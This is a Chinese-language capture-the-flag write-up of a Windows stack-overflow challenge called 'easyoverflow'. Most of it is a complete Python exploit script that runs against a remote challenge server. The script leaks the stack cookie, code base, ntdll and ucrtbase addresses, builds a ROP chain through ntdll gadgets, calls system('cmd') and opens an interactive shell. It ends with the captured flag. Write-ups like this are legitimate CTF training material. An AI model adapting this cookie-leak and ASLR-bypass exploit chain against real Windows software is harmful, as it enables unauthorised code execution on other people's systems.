[Pwn] easyoverflow - cpt.shao xp0int Posted on Aug 28 2020 windows 下简单的栈溢出,rop过程比较复杂,code段可用gadget太少,可以先泄露栈上一个ntdll的地址,然后就可以使用ntdll里面丰富的gadget了。和linux系统不同,这里好像没有plt函数的概念,因此调用来自ucrtbase的函数时候要借助以下两条gadget。 ``` mov_rax_rax = ntdll_base + 0xbbd33 #0x00000001800bbd33: mov rax, qword ptr [rax]; ret; call_rax = ntdll_base + 0xa479d #0x00000001800a479d: call rax; nop; add rsp, 0x28; ret; ``` 思路是先通过泄露iat表上ucrtbase库函数地址puts,算ucrtbase的基地址,然后知道system地址以后就可以system("/cmd")。做法还是比较直接,就是winddbg preview的环境配置比较坑。而且windows不像linux可以直接加载自定义的动态库,打远程的时候偏移还得重新改。 ```python from winpwn import * import sys context.log_level = "debug" # p = process(["./StackOverflow.exe", "1"]) p = remote("39.99.46.209", 13389) cyclic = "aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaad" p.recvuntil("input:") p.send("A"*0xfc + "@@@@") p.recvuntil("@@@@") cookie = u64(p.recv(6) + "\x00\x00") print "cookie: %#x" % cookie p.recvuntil("input:") p.send("B"*(0x118-4) + "@@@@") p.recvuntil("@@@@") leak_code = u64(p.recv(6) + "\x00\x00") print "leak_code : %#x" % leak_code code_base = leak_code - 0x12f4 p.recvuntil("input:") p.send(cyclic[:0x100] + p64(cookie) + p64(0) + p64(0) + p64(code_base+0x1000)) p.recvuntil("input:") p.send("A"*0xfc + "@@@@") p.recvuntil("@@@@") cookie = u64(p.recv(6) + "\x00\x00") print "cookie: %#x" % cookie p.recvuntil("input:") p.send("C"*(0x180-4) + "@@@@") p.recvuntil("@@@@") leak_ntdll = u64(p.recv(6) + "\x00\x00") print "leak_ntdll: %#x" % leak_ntdll ntdll_base = leak_ntdll - 0x6a271 # ntdll print "ntdll_base: %#x" % ntdll_base hlt = ntdll_base + 0x6dca pop_rax = ntdll_base + 0x2010c # 0x000000018002010c: pop rax; ret; pop_rcx = ntdll_base + 0x9217b # 0x000000018009217b: pop rcx; ret; iat_puts = code_base + 0x2180 iat_read = code_base + 0x2178 call_puts= code_base + 0x1078 mov_rax_rax = ntdll_base + 0xbbd33 #0x00000001800bbd33: mov rax, qword ptr [rax]; ret; call_rax = ntdll_base + 0xa479d #0x00000001800a479d: call rax; nop; add rsp, 0x28; ret; pop_rdx_r11 = ntdll_base + 0x8fb37 # 0x000000018008fb37: pop rdx; pop r11; ret; pop_r8 = ntdll_base + 0x2010b # 0x000000018002010b: pop r8; ret; main = code_base + 0x1000 rop=[] rop.append(pop_rcx) rop.append(iat_puts) rop.append(pop_rax) rop.append(iat_puts) rop.append(mov_rax_rax) rop.append(call_rax) rop = "".join(map(p64, rop)) p.recvuntil("input:") p.send("A"*0x100 + p64(cookie) + p64(0) + p64(0) + rop + "B"*0x28 + p64(main)) p.recvline() p.recvline() p.recvline() leak_utbase = u64(p.recvline()[:6] + "\x00\x00") print "leak_utbase: %#x" % leak_utbase utbase = leak_utbase - 0x7fb60 # puts_off system = utbase + 0xaafa0 # system_off print "utbase: %#x" % utbase print "system: %#x" % system rop = [] rop.append(pop_rcx) rop.append(0) rop.append(pop_rdx_r11) rop.append(code_base + 0x3c00) rop.append(0) rop.append(pop_r8) rop.append(0x8) rop.append(pop_rax) rop.append(iat_read) rop.append(mov_rax_rax) rop.append(call_rax) rop = "".join(map(p64, rop)) rop1 = [pop_rcx, code_base + 0x3c00, system] rop1 = "".join(map(p64, rop1)) # windbgx.attach(p, "~0s\nbp StackOverflow+0x10c9\n") p.recvuntil("input:") p.send("A"*0xfc + "@@@@") p.recvuntil("@@@@") cookie = u64(p.recv(6) + "\x00\x00") print "cookie: %#x" % cookie p.recvuntil("input:") p.send("A"*(0x100)) p.recvuntil("input:") p.send(cyclic[:0x100] + p64(cookie) + p64(0) + p64(0) + rop + "B"*0x28 + rop1) p.send("cmd".ljust(8, "\x00")) # ntdll_base = leak_ntdll - 0x6ce51 #flag{You_Know_Windows_ASLR_1s_Funny} p.interactive() ``` 打赏还是打残,这是个问题 赏 Wechat Pay Alipay 0x00 题目名称 [强网先锋] Funhash - Donek1
没有帐号? 立即注册